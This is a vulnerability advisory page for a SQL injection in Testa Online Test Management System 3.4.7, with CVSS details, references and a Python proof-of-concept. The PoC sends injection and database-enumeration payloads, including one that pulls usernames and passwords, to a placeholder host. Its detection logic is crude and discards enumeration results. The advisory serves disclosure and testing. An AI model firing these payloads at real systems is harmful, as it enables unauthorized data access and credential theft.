Security Vulnerability Report
CVE-2021-47902 CVSS 8.2 HIGH

Published: 2026-01-27 16:16:13
Last Modified: 2026-04-15 00:35:42

Description

Testa Online Test Management System 3.4.7 contains a SQL injection vulnerability that allows attackers to manipulate database queries through the 'q' search parameter. Attackers can inject malicious SQL code in the search field to extract database information, potentially accessing sensitive user or system data.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

Testa Online Test Management System < 3.4.7
Testa Online Test Management System = 3.4.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2021-47902 SQL Injection PoC for Testa Online Test Management System 3.4.7
# Target: Testa Online Test Management System
# Vulnerability: SQL Injection in 'q' search parameter
import requests
import sys

target_url = "http://target-host/testa/search"

# Basic authentication bypass detection payloads
basic_payloads = [
    "'",
    "' OR '1'='1",
    "' OR 1=1--",
    "' UNION SELECT NULL--",
    "' AND SLEEP(5)--"
]

# Database enumeration payloads
enum_payloads = [
    "' UNION SELECT table_name FROM information_schema.tables--",
    "' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--",
    "' UNION SELECT username,password FROM users--"
]


def test_sqli(url, payload):
    """Test SQL injection vulnerability"""
    params = {'q': payload}
    try:
        response = requests.get(url, params=params, timeout=10)
        # Check for SQL error indicators in response
        sql_error_indicators = [
            "mysql", "sql", "syntax", "error", "warning",
            "mysql_fetch", "mysql_query", "pdo", "sqlite"
        ]
        response_lower = response.text.lower()
        for indicator in sql_error_indicators:
            if indicator in response_lower:
                return True, indicator
    except Exception as e:
        print(f"[-] Error: {e}")
    return False, None


def main():
    print("[*] CVE-2021-47902 SQL Injection Test")
    print(f"[*] Target: {target_url}")
    # Basic vulnerability check
    for payload in basic_payloads:
        print(f"[*] Testing payload: {payload}")
        is_vulnerable, error_type = test_sqli(target_url, payload)
        if is_vulnerable:
            print("[!] Potential SQL injection detected!")
            print(f"[!] Error type: {error_type}")
            print(f"[!] Vulnerable payload: {payload}")
            # Attempt enumeration
            print("[*] Attempting database enumeration...")
            for enum_payload in enum_payloads:
                print(f"[*] Testing: {enum_payload}")
                test_sqli(target_url, enum_payload)
            break


if __name__ == "__main__":
    main()
```

References

https://web.archive.org/web/20220406031253/https://testa.cc/
https://www.exploit-db.com/exploits/49194
https://www.vulncheck.com/advisories/testa-online-test-management-system-q-sql-injection

Weakness

CWE-89 (SQL Injection)

Additional Metrics (from the NVD record)

CVSS 4.0 Vector (secondary): CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVSS 4.0 Score: 8.8 HIGH
CVSS 3.1 Exploitability Score: 3.9
CVSS 3.1 Impact Score: 4.2
Vulnerability Status: Deferred